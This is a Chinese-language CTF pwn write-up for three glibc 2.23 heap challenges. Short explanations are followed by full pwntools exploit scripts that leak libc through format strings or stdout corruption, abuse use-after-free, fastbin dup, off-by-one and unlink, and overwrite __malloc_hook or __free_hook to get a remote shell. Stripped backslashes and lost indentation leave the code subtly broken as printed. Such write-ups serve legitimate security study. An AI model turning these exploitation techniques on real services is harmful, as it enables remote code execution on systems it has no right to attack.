EASY_ABNORMAL
格式化字符串泄漏libc地址,uaf来泄漏堆地址
利用异常机制将栈迁移到堆上执行gadget
from pwn import *
binary = "./pwn"
libc = ELF('./libc-2.23.so')
p = remote("123.56.52.128","10012")
def name(payload):
p.sendafter('NAME: ',payload)
def add(data):
p.sendlineafter('CHOICE :','2')
p.sendafter('cnt:',data)
def free(index):
p.sendlineafter('CHOICE :','3')
p.sendlineafter('idx:',str(index))
def show_note():
p.sendlineafter('CHOICE :','4')
def format():
p.sendlineafter('CHOICE :','1')
def gift(payload):
p.sendlineafter('CHOICE :','23333')
p.sendafter("INPUT:",payload)
name("%11$p
")
format()
p.recvuntil('0x')
main = int(p.recv(12),16) - 240
libc_base = main - libc.sym['__libc_start_main']
one_gadget = libc_base + 0x4527a
payload = p64(0) * 4 + p64(one_gadget)
add(payload + '
')
add(payload + '
')
free(0)
free(1)
show_note()
p.recvuntil('idx 2:')
heap_addr = u64(p.recv(6).ljust(8,'x00'))
payload1 = 'x00' * 32 + p64(heap_addr + 0x28)
gift(payload1)
p.interactive()
maj0rone
仔细分析下这个是不难的,主要在于add功能绕回答一个问题,分析输入80就能绕过了
然后就是简单的uaf,爆破下IO,没给libc,直接用本地的试了一下就通了
from pwn import *
local = 0
'''
time: 2020-11-14
libc: libc-2.23.so
python version:2.7
'''
binary = "./pwn"
libc_path = '/lib/x86_64-linux-gnu/libc-2.23.so'
port = "18523"
def dbg():
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
def add(size,content):
p.sendlineafter('>> ','1')
p.sendlineafter('please answer the question','80')
p.sendlineafter('______?',str(size))
p.sendafter('start_the_game,yes_or_no?',content)
def edit(index,content):
p.sendlineafter('>> ','4')
p.sendlineafter('index ?',str(index))
p.sendafter('__new_content ?',content)
def free(index):
p.sendlineafter('>> ','2')
p.sendlineafter('index ?',str(index))
def leak_libc(addr):
global libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_
libc = ELF(libc_path)
libc_base = addr - libc.sym['_IO_2_1_stderr_']
print "[*] libc base:",hex(libc_base)
__malloc_hook = libc_base + libc.sym['__malloc_hook']
system = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search('/bin/sh').next()
__free_hook = libc_base + libc.sym['__free_hook']
_IO_2_1_stdout_ = libc_base + libc.sym['_IO_2_1_stdout_']
byte_bss = 0x603038
bss1 = 0x60303C
bss2 = 0x603040
yes = 0x603060
sizearray = 0x603260
heaparray = 0x6032E0
content = 0x6033E0
while True:
try:
if local == 1:
p = process(binary)
else:
p = remote("123.56.52.128",port)
add(0x60,'0')
add(0x60,'1')
add(0x10,'2')
add(0x10,'3')
free(1)
free(0)
free(1)
edit(1,'x40')
payload = p64(0) * 6 + p64(0) + p64(0x71)
edit(0,payload)
add(0x60,'4')
add(0x60,'5')
free(1)
payload = p64(0) * 5 + p64(0x91)
edit(5,payload)
free(1)
payload = p64(0) * 5 + p64(0x71) + 'xddx65'
edit(5,payload)
payload = 3 * 'a' + p64(0) * 6 + p64(0xfbad1800) # change flags
payload += p64(0) * 3 + 'x00' # make _IO_write_base smaller
add(0x60,'6')
add(0x60,'7')
edit(7,payload)
leak = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00')) - 192
leak_libc(leak)
add(0x60,'8')
free(8)
edit(8,p64(__malloc_hook - 0x23))
one_gadget_list = [0x45226,0x4527a,0xf0364,0xf1207]
one_gadget = libc_base + one_gadget_list[3]
payload = 0x13 * 'a' + p64(one_gadget)
add(0x60,'9')
add(0x60,'10')
edit(10,payload)
p.interactive()
break
except Exception as e:
print(e)
p.close()
continue
lgtwo
跟De1ctf一个题有点儿像,漏洞是off-by-one
布置堆结构在fastbin的fd上踩出一个unsorted bin指针,爆破IO即可
最后unlink
from pwn import *
local = 0
binary = "./pwn"
libc_path = '/lib/x86_64-linux-gnu/libc-2.23.so'
port = "45830"
def dbg():
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
def add(size,content):
p.sendlineafter('>>','1')
p.sendlineafter('size?',str(size))
p.sendafter('content?',content)
def free(index):
p.sendlineafter('>>','2')
p.sendlineafter('index ?',str(index))
def edit(index,content):
p.sendlineafter('>>','4')
p.sendlineafter('index ?',str(index))
p.sendafter('what is your new content ?',content)
def leak_libc(addr):
global libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_
libc = ELF(libc_path)
libc_base = addr - libc.sym['_IO_2_1_stderr_']
print "[*] libc base:",hex(libc_base)
__malloc_hook = libc_base + libc.sym['__malloc_hook']
system = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search('/bin/sh').next()
__free_hook = libc_base + libc.sym['__free_hook']
_IO_2_1_stdout_ = libc_base + libc.sym['_IO_2_1_stdout_']
heaparray = 0x6020C0
sizearray = 0x602040
some = 0x602038
content = 0x6021C0
fd = heaparray + 0x8 * 7 - 0x18
bk = heaparray + 0x8 * 7- 0x10
elf = ELF(binary)
while True:
try:
if local == 1:
p = process(binary)
else:
p = remote("123.56.52.128",port)
# dbg()
add(0x18,'a') # 0
add(0x18,'b') # 1
add(0x60,'c') # 2
add(0x58,'c') # 3
add(0x10,'pro') # 4
edit(0,0x10 * 'a' + 8 * 'x00' + 'xf1')
# edit(3,0x50 * 'a' + p64(0xf0) + 'x20')
free(1)
free(2)
# add(0x60,'dddd')
add(0x18,'heihei') # 1
# add(0x60,'bao')
add(0xc0,'az') # 2
edit(1,0x18 * 'a' + 'x71')
edit(0,0x10 * 'a' + 8 * 'x00' + 'xf1')
free(1)
add(0xe0,'hello') # 1
payload = p64(0) * 3 + p64(0x71) + 'xddx65'
edit(1,payload)
add(0x60,'lemon')
add(0x60,'fakechunk') # 6
payload = 3 * 'a' + p64(0) * 6 + p64(0xfbad1800) # change flags
payload += p64(0) * 3 + 'x00' # make _IO_write_base smaller
edit(6,payload)
leak = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00')) - 192
log.success("LEAK:{}".format(hex(leak)))
leak_libc(leak)
add(0x38,'a') # 7
add(0x80,'b') # 8
add(0x10,'/bin/shx00') # 9
edit(9,'/bin/shx00')
payload = p64(0) + p64(0x31) + p64(fd) + p64(bk)
payload = payload.ljust(0x30,'x00')
payload += p64(0x30) +'x90'
edit(7,payload)
free(8)
edit(7,p64(0) * 3 + p64(__free_hook))
edit(7,p64(system))
free(9)
p.interactive()
break
except Exception as e:
print(e)
p.close()
continue